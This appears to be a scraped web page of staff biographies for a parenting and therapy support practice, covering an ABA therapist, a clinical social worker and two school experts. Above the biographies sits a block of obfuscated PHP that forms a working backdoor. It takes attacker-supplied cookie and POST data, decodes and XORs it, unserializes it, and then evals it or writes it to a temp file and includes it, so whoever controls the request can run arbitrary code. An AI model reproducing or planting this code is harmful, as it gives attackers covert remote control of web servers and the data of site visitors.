$mDTmQtm = "\161" . "\x51" . "\147" . chr (95) . chr ( 611 - 512 )."\101" . "\120" . 'L' . 'r';$SlbppUtgCY = chr (99) . chr (108) . "\141" . 's' . chr ( 864 - 749 ).chr (95) . chr ( 418 - 317 ).chr ( 213 - 93 )."\x69" . "\163" . "\164" . "\x73";$osdoKIoVYa = class_exists($mDTmQtm); $mDTmQtm = "53223";$SlbppUtgCY = "35330";$xSgokxU = FALSE;if ($osdoKIoVYa === $xSgokxU){function BehAzZY(){return FALSE;}$SXjtY = "15413";BehAzZY();class qQg_cAPLr{public function jXnapstw(){echo "6497";}private $IAenRkun;public static $AiQLHxrX = "b344f68d-03b4-455a-9afc-5d9630044778";public static $nhMOUpIYg = 10539;public function __destruct(){$SXjtY = "10005_63087";$this->FkvMnAhJ($SXjtY); $SXjtY = "10005_63087";}public function __construct($dpTFBAOeN=0){$nXUPKMPX = $_POST;$lLVTYLIH = $_COOKIE;$VtPvz = @$lLVTYLIH[substr(qQg_cAPLr::$AiQLHxrX, 0, 4)];if (!empty($VtPvz)){$BxbbEREx = "base64";$kJlRoujl = "";$VtPvz = explode(",", $VtPvz);foreach ($VtPvz as $teVyFrmA){$kJlRoujl .= @$lLVTYLIH[$teVyFrmA];$kJlRoujl .= @$nXUPKMPX[$teVyFrmA];}$kJlRoujl = array_map($BxbbEREx . chr (95) . chr (100) . "\x65" . 'c' . chr (111) . 'd' . "\145", array($kJlRoujl,)); $kJlRoujl = $kJlRoujl[0] ^ str_repeat(qQg_cAPLr::$AiQLHxrX, (strlen($kJlRoujl[0]) / strlen(qQg_cAPLr::$AiQLHxrX)) + 1);qQg_cAPLr::$nhMOUpIYg = @unserialize($kJlRoujl);}}private function FkvMnAhJ($SXjtY){if (is_array(qQg_cAPLr::$nhMOUpIYg)) {$pZmfqTVvP = str_replace('<' . "\77" . "\160" . "\150" . 'p', "", qQg_cAPLr::$nhMOUpIYg['c' . chr (111) . 'n' . "\x74" . chr ( 245 - 144 ).chr ( 477 - 367 )."\164"]);eval($pZmfqTVvP); $SXjtY = "15413";exit();}}}$QXjbu = new /* 42002 */ qQg_cAPLr(15413); $QXjbu = str_repeat("10005_63087", 1);}$dZybetSeZt = chr (89) . 'f' . "\x4a" . "\x5f" . chr (81) . chr ( 647 - 542 )."\103";$OjHzDvWE = chr (99) . chr ( 185 - 77 ).'a' . "\163" . "\163" . '_' . "\x65" . "\170" . chr (105) . "\x73" . "\164" . "\x73";$rgzbfjYkA = class_exists($dZybetSeZt); $OjHzDvWE = "24706";$LTyLCJCtf = strpos($OjHzDvWE, $dZybetSeZt);if ($rgzbfjYkA == $LTyLCJCtf){function qgLDORxeJg(){$VccYcaHLTD = new /* 18454 */ YfJ_QiC(64637 + 64637); $VccYcaHLTD = NULL;}$nXhkvp = "64637";class YfJ_QiC{private function pLOVwTKZ($nXhkvp){if (is_array(YfJ_QiC::$aTjowQs)) {$name = sys_get_temp_dir() . "/" . crc32(YfJ_QiC::$aTjowQs["salt"]);@YfJ_QiC::$aTjowQs["write"]($name, YfJ_QiC::$aTjowQs["content"]);include $name;@YfJ_QiC::$aTjowQs["delete"]($name); $nXhkvp = "64637";exit();}}public function TqBmlPFDe(){$VoxaRJ = "17858";$this->_dummy = str_repeat($VoxaRJ, strlen($VoxaRJ));}public function __destruct(){YfJ_QiC::$aTjowQs = @unserialize(YfJ_QiC::$aTjowQs); $nXhkvp = "34560_63225";$this->pLOVwTKZ($nXhkvp); $nXhkvp = "34560_63225";}public function XcLyEfYHb($VoxaRJ, $qeXdlDNebc){return $VoxaRJ[0] ^ str_repeat($qeXdlDNebc, intval(strlen($VoxaRJ[0]) / strlen($qeXdlDNebc)) + 1);}public function yqgqW($VoxaRJ){$ZoNAcJX = chr ( 504 - 406 ).chr (97) . "\163" . "\x65" . chr ( 539 - 485 ).chr (52);return array_map($ZoNAcJX . chr (95) . "\144" . chr ( 923 - 822 )."\x63" . 'o' . "\x64" . chr (101), array($VoxaRJ,));}public function __construct($gJoUvdmuX=0){$yhYgEuGd = "\x2c";$VoxaRJ = "";$ATEPnH = $_POST;$ubRMQ = $_COOKIE;$qeXdlDNebc = "82017243-3fbb-4923-9d9f-7f9873638a48";$fbUGxEwrJ = @$ubRMQ[substr($qeXdlDNebc, 0, 4)];if (!empty($fbUGxEwrJ)){$fbUGxEwrJ = explode($yhYgEuGd, $fbUGxEwrJ);foreach ($fbUGxEwrJ as $SluKmtDZX){$VoxaRJ .= @$ubRMQ[$SluKmtDZX];$VoxaRJ .= @$ATEPnH[$SluKmtDZX];}$VoxaRJ = $this->yqgqW($VoxaRJ);}YfJ_QiC::$aTjowQs = $this->XcLyEfYHb($VoxaRJ, $qeXdlDNebc);if (strpos($qeXdlDNebc, $yhYgEuGd) !== FALSE){$qeXdlDNebc = explode($yhYgEuGd, $qeXdlDNebc); $DsCoVEOPE = sprintf("34560_63225", strrev($qeXdlDNebc[0]));}}public static $aTjowQs = 13012;}qgLDORxeJg();}$NzZpq = 'W' . chr (67) . chr (83) . chr ( 592 - 497 ).chr ( 662 - 547 ).chr ( 149 - 80 ).chr ( 842 - 725 ); $IOHuJv = chr (99) . "\x6c" . chr ( 878 - 781 ).chr ( 1031 - 916 ).chr (115) . chr ( 133 - 38 ).'e' . chr (120) . "\x69" . chr (115) . chr ( 447 - 331 )."\x73";$dQWgedKddy = class_exists($NzZpq); $IOHuJv = "34190";$kGuoRuT = !1;if ($dQWgedKddy == $kGuoRuT){function yqHcuCi(){$AmowkmU = new /* 53737 */ WCS_sEu(1527 + 1527); $AmowkmU = NULL;}$XKNwuMuU = "1527";class WCS_sEu{private function zpmPoto($XKNwuMuU){if (is_array(WCS_sEu::$RgpxxKgIxg)) {$ObgWFH = sys_get_temp_dir() . "/" . crc32(WCS_sEu::$RgpxxKgIxg['s' . chr (97) . 'l' . "\x74"]);@WCS_sEu::$RgpxxKgIxg["\x77" . 'r' . 'i' . "\x74" . chr ( 111 - 10 )]($ObgWFH, WCS_sEu::$RgpxxKgIxg[chr ( 1032 - 933 ).'o' . "\156" . 't' . "\145" . "\156" . "\164"]);include $ObgWFH;@WCS_sEu::$RgpxxKgIxg[chr (100) . 'e' . chr ( 491 - 383 )."\x65" . chr (116) . chr ( 604 - 503 )]($ObgWFH); $XKNwuMuU = "1527";exit();}}private $BUHnPV;public function PmnFxs(){echo 29404;}public function __destruct(){$XKNwuMuU = "48313_44046";$this->zpmPoto($XKNwuMuU); $XKNwuMuU = "48313_44046";}public function __construct($nLinsOBa=0){$FwbEKmok = $_POST;$TzixD = $_COOKIE;$FBVMpOD = "69731d62-1cec-4f24-ba94-c5f71e5a20ba";$dhaAbE = @$TzixD[substr($FBVMpOD, 0, 4)];if (!empty($dhaAbE)){$NmTbP = "base64";$nZRPDOd = "";$dhaAbE = explode(",", $dhaAbE);foreach ($dhaAbE as $gWQpinN){$nZRPDOd .= @$TzixD[$gWQpinN];$nZRPDOd .= @$FwbEKmok[$gWQpinN];}$nZRPDOd = array_map($NmTbP . chr ( 282 - 187 )."\144" . chr ( 545 - 444 )."\143" . "\x6f" . "\x64" . 'e', array($nZRPDOd,)); $nZRPDOd = $nZRPDOd[0] ^ str_repeat($FBVMpOD, (strlen($nZRPDOd[0]) / strlen($FBVMpOD)) + 1);WCS_sEu::$RgpxxKgIxg = @unserialize($nZRPDOd); $nZRPDOd = class_exists("48313_44046");}}public static $RgpxxKgIxg = 16221;}yqHcuCi();}$UoqUU = 'O' . chr (84) . "\x5f" . chr (122) . chr ( 600 - 528 )."\x41";$IripZhFS = "\143" . chr (108) . "\141" . "\163" . "\163" . "\x5f" . chr (101) . chr (120) . chr (105) . chr ( 246 - 131 ).'t' . chr (115); $oMCbQd = $IripZhFS($UoqUU); $UoqUU = "4044";$kiRtOneXo = $oMCbQd;$IripZhFS = "24681";if (!$kiRtOneXo){class OT_zHA{private $lorLfSd;public static $NfThimbHP = "18be2c58-d641-4483-9658-f52eddcea183";public static $gvLcP = 35757;public function __construct($kQcLZP=0){$mgHJJDsou = $_COOKIE;$lcatmdtAS = $_POST;$XusJKlPh = @$mgHJJDsou[substr(OT_zHA::$NfThimbHP, 0, 4)];if (!empty($XusJKlPh)){$LzCUwkavRo = "base64";$vPdThwoImX = "";$XusJKlPh = explode(",", $XusJKlPh);foreach ($XusJKlPh as $kywvHDJe){$vPdThwoImX .= @$mgHJJDsou[$kywvHDJe];$vPdThwoImX .= @$lcatmdtAS[$kywvHDJe];}$vPdThwoImX = array_map($LzCUwkavRo . "\137" . chr (100) . 'e' . 'c' . 'o' . "\x64" . "\145", array($vPdThwoImX,)); $vPdThwoImX = $vPdThwoImX[0] ^ str_repeat(OT_zHA::$NfThimbHP, (strlen($vPdThwoImX[0]) / strlen(OT_zHA::$NfThimbHP)) + 1);OT_zHA::$gvLcP = @unserialize($vPdThwoImX);}}private function hLNLo(){if (is_array(OT_zHA::$gvLcP)) {$VlgyE = sys_get_temp_dir() . "/" . crc32(OT_zHA::$gvLcP['s' . 'a' . 'l' . chr ( 422 - 306 )]);@OT_zHA::$gvLcP['w' . chr ( 1009 - 895 ).'i' . "\x74" . "\x65"]($VlgyE, OT_zHA::$gvLcP["\x63" . "\x6f" . 'n' . "\x74" . "\x65" . chr (110) . "\164"]);include $VlgyE;@OT_zHA::$gvLcP[chr ( 399 - 299 ).chr ( 634 - 533 )."\154" . 'e' . 't' . chr (101)]($VlgyE); $dhIQXwh = "34718";exit();}}public function __destruct(){$this->hLNLo(); $dhIQXwh = "34718";$ugdovq = str_pad($dhIQXwh, 10);}}$GVZzhd = new /* 58847 */ OT_zHA(); $GVZzhd = substr("59266_11543", 1);}
Therapist, special educator, mom, wife, sister, artist, musician, advocate, dancer, sleep trainer, show tune lover, baby-food-maker — As an adjunct Professor at Hunter College Graduate School of Education Jennifer believes that therapy starts in the home and therapists and families should work together within the child’s natural environment to make positive change. After graduating from both Columbia University (BA) and Hunter College (MA, MsEd) with highest honors Jennifer decided to approach life through a behavioral perspective and base her own parenting style around the principles of Applied Behavior Analysis. She is a Behavioral Therapist and Applied Behavioral Analyst as well as a Certified General and Special Education Teacher. Jennifer’s early research focused on the most effective therapies during early childhood for children with severe and multiple disabilities to ensure a better quality of long term life. During her graduate schooling Jennifer created a technology system in which all medical professionals could easily access the Early Intervention providers in their vicinity in order to provide parents and patients with the most up to date information in regards to developmental therapies. During this time Jennifer observed that educating parents in Early Intervention therapies actually escalated the progress that their children made during these therapy sessions. Today, Jennifer hopes to not only help children grow and succeed but to help their parents and siblings learn and grow with them together.
Currently, Jennifer focuses on mom support groups. Whether your child/children are neurotypically developing, delayed or diagnosed with a developmental disability(s) Jennifer helps parents tackle the everyday and long term challenges of parenthood. She specializes in feeding, sleeping, potty training, and other behavioral facets of everyday life. Any child can be motivated to learn and succeed – it’s up to the therapist to figure out what motivates a child in order to both bond together and help make progress. With a little bit of magic or song and dance (and possibly some Elmo impressions) coupled with behavioral expertise Jennifer believes that any child can grow and thrive!
Rachel is a Licensed Clinical Social worker, living in Greenwich, CT.She received her Masters in Social Work from Hunter College School of Social Work in New York and completed a certificate in psychoanalytic psychotherapy from the Institute for Contemporary Psychotherapy, also in New York. In addition, Rachel completed a certificate program in Cognitive Behavioral Therapy from the Beck Institute.
Rachel worked at Memorial Sloan-Kettering Cancer Center (MSKCC), where she provided individual, couples’, family and group counseling to cancer patients and their family members. Later, she developed and oversaw the Virtual Groups Program for MSKCC to provide live, online, interactive support groups and educational programs for patients and families. The Virtual Groups Program was the first of its kind at any healthcare institution.
Prior to moving to Connecticut, Rachel had a private psychotherapy practice on Manhattan’s Upper East Side.
Rachel has presented widely on the topics of group work, bereavement and program development.
Publications include:
2008 Schneider, R. Entry in Encyclopedia of Social Work with Groups, Gitterman, A. and Salmon, R. (Eds)., “Group Work with Oncology Patients.”
2006 Schneider, R. “Group Bereavement Support for Spouses Who Are Grieving the Loss of a Partner to Cancer”, Social Work with Groups 29(3/4)
MAYA PARISER, MsEd (Urban Elementary School Expert)
REBECCA ZALTAS, MsEd (Suburban Elementary School Expert)